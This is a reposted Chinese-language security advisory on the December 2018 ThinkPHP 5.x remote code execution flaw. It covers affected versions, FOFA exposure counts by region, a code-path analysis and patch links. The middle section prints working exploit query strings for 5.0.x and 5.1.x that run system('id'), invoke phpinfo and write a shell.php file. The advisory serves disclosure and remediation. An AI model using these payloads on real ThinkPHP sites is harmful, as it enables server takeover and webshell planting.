2018年12月10日,白帽汇安全研究院发现thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞,该漏洞是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。
此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.1.0RC版本于今年的5月2日发布,但在短短几个月时间内就爆出远程代码执行漏洞,其框架安全性可能会在日后遭受更严峻的考验。据不完全统计,目前全球使用ThinkPHP5及其二次开发系统的网站大概12万。
ThinkPHP诞生于2006年,是一个国产开源的PHP开发框架,其借鉴了Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。ThinkPHP可在Windows和Linux等操作系统运行,支持MySql,Sqlite和PostgreSQL等多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
目前FOFA系统最新数据(一年内数据)显示全球范围内共有 21万个ThinkPHP网站对外开放服务。中国大陆地区使用数量最多,共有113339台,美国第二,共有37011台,中国香港特别行政区第三,共有12262台,新加坡第四,共有3829台。
全球范围内ThinkPHP网站分布情况(仅为分布情况,非漏洞影响情况)
中国大陆地区浙江省使用用数量最多,共有66163台;北京市第二,共有21416台,广东省第三,共有5431台,上海市第四,共有2863台,河南省第五,共有2629台。
中国大陆范围内ThinkPHP网站分布情况(仅为分布情况,非漏洞影响情况)
严重
目前漏洞影响版本号包括:
5.x < 5.1.31 5.x <= 5.0.23
以下基于ThinkPHP5 二次开发的内容管理系统,很可能收到该漏洞影响,建议厂商及时更新。
以ThinkPHP5.1版本为例,该漏洞出现在路由调度功能,首先查看相关函数,在thinkphp/library/think/route/dispatch/Module.php中。主要函数代码如下:
发现在着色部分调用了controller方法来实例化控制器,跟进controller方法,在controller方法里又调用了parseModuleAndClass方法解析module和class。跟进parseModuleAndClass方法。
在parseModuleAndClass方法中,如果$name中含有\,则把$name当作类名处理。此处$name可以由访问者控制,也就是说,访问者可以控制实例化任何一个类。比如通过发送GET请求s=index/\think\class/get参数,可以实例化\think\class类并执行get方法。这里也可以通过pathinfo的方式来进行利用,但是在windows下会把 \ 转为 / 。
根据以上分析,找到以下几处漏洞利用点:
5.0.x版本
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
5.1.x版本
s=index/\think\Request/input&filter=phpinfo&data=1 s=index/\think\Request/input&filter=system&data=id s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
漏洞复现
目前FOFA客户端平台已经更新该ThinkPHP漏洞的检测POC。
1、官网已发布安全更新,用户可以通过网址http://www.thinkphp.cn/topic/60400.html 获得.
2、如暂时无法更新到最新版本,可以按照按官网指示手动修复,网址:https://blog.thinkphp.cn/869075。
3、建议使用以上ThinkPHP5 开发的内容管理系统的用户及时检查是否存在该漏洞。
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.